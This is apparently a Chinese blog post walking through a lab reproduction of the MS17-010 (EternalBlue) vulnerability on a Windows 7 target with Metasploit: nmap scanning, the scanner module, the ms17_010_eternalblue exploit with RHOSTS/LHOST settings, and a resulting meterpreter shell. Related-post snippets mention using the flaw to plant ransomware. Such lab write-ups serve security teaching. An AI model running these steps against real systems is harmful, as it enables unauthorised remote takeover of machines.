[永恒之蓝]实战-漏洞复现

已于 2024-01-20 18:30:52 修改
阅读量242 收藏 1
点赞数
文章标签: 安全 web安全 网络
于 2023-01-05 22:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dzqxwzoe/article/details/128561875
版权

环境准备

目标:192.168.164.129(win7)漏洞:MS17-010(永恒之蓝)目的:拿到最高权限,进行远程代码执行

一、确定目标及漏洞

1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。

二、查找验证模块并且调用

1、使用#search MS17-010命令,搜索查找MS17-010漏洞模块,
2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击" style=“margin: auto” />

#use auxiliary/scanner/smb/smb_ms17_010

3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。在这里插入图片描述4、设置目标地址,设置目标端口" style=“margin: auto” />

set RHOSTS 192.168.164.129 
set RPORT 445

5、最后使用#run或者exploit命令去运行查看漏洞是否存在在这里插入图片描述6、Host is likely VULNERABLE to MS17-010! 这个主机存在MS17-010漏洞,可以去利用。 检测到该目标操作系统是Windows 7 专业版 接下来我们可以利用exploits模块进行渗透攻击。*有+号就可以攻击,可以进行IP范围扫描" style=“margin: auto” />

三、利用exploist模块进行渗透

1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。 先使用#back命令退出辅助模块,
2、使用#search MS17-010命令,搜索MS17-010模块,如图:在这里插入图片描述3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。这里我们选择#" style=“margin: auto” />

use exploit/windows/smb/ms17_010_eternalblue

4、使用#show options命令,查看需要设置的参数,如图:在这里插入图片描述5、这里我们看见多出一个payload选项在这里插入图片描述在这里插入图片描述6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标I" style=“margin: auto” />

#set RHOSTS 192.168.164.129 
#set LHOST 192.168.164.128

<
7、最后使用#run命令去运行exploit
8、显示meterpreter,我们已经所渗透成功了,现在我们已经拿到目标机的Shell了。 我们可以使用#shell命令,在目标机打开一个shell。在这里插入图片描述9、输入shell,就可以进入目标靶机的shell命令界面;(出来是乱码:输入chcp 65001 这是utf8编码)![在这里插入图片描述](https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/bf14b5b946b44c268c0c133b32846438~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image" style=“margin: auto” />

程序员小强_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之蓝漏洞复现
m0_62392732的博客
12-16 1985
实验目的:通过对目标靶机的渗透过程,了解永恒之蓝的危害 系统环境:Kali Linux 2、win7靶机 实验工具:不限 实验步骤 具体操作: 首先下载并安装win7虚拟机,打开后关闭防火墙 扫描本机ip 用Kali扫描同网段的存活IP: 判断ip地址为192.168.42.133 Nmap此地址 此操作可以发现是win7系统并且455端口是开的,可以攻击 输入攻击指令 搜索永恒之蓝模块: search ms17_010 我们这里使用第三个模块,目的是扫
永恒之蓝(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格)
渗透测试工具-Metasploit使用复现永恒之蓝漏洞
weixin_53440207的博客
02-23 1047
metasploit使用以及复现永恒之蓝漏洞
利用永恒之蓝漏洞(ms17-010)对win7上传勒索病
最新发布
m0_74402888的博客
04-27 965
攻击机kali:192.168.83.136靶机win7:192.168.83.144。
二、永恒之蓝漏洞
qq_59235193的博客
02-02 343
本次测试主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝漏洞利用原理。永恒之蓝是Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
MS17-010(永恒之蓝)漏洞复现和分析
daoshiwa的博客
09-21 3444
永恒之蓝
【ms17-010】永恒之蓝漏洞复现
leekos的博客,分享web安全相关知识~
04-04 1782
因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况。扫描出来了漏洞,接着我们需要使用工具利用漏洞。这个时候我们已经成功了,远程命令执行。的主机开启,并且显示了开放的端口号。设置完成之后,就可以开始攻击了,使用。分析了相关信息后,我们就可以使用。命令可以查看可以使用哪些命令。(靶机的ip地址),使用。
MS1710永恒之蓝漏洞利用
07-07
MS1710永恒之蓝漏洞利用
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
永恒之蓝检测工具MS17-010漏洞扫描工具
小计一次永恒之蓝实战
08-20
一次局域网内的永恒之蓝实战,msf的一次小实战
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之蓝Windows10版初探
crowsec
03-15 1291
永恒之蓝(ms17-010)通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。相关的cve有:CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148。基本上我们搜索永恒之蓝漏洞复现,99%的师傅选择的都是Windows7或者。
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 4495
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
Metasploit永恒之蓝[ms17_010]Windows7渗透实验
EnerY3的博客
11-16 320
永恒之蓝是一种计算机网络安全漏洞。它主要影响Windows操作系统,包括本次的实验对象Windows7。[ms17_010]:windows2017年的第10号漏洞
永恒之蓝漏洞复现测试
m0_60547686的博客
08-12 393
永恒之蓝MS17-010漏洞复现及利用 一、什么是永恒之蓝永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。 SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。 二、复现
ms17-010(永恒之蓝漏洞复现与处理
06-06
对于 ms17-010(永恒之蓝漏洞复现和处理,需要进行以下几个步骤: 1. 确认系统是否存在漏洞:检查系统是否存在 SMB 服务,如果存在并且版本为 Windows 7、Windows Server 2008 R2 或更高版本,则可能存在该漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值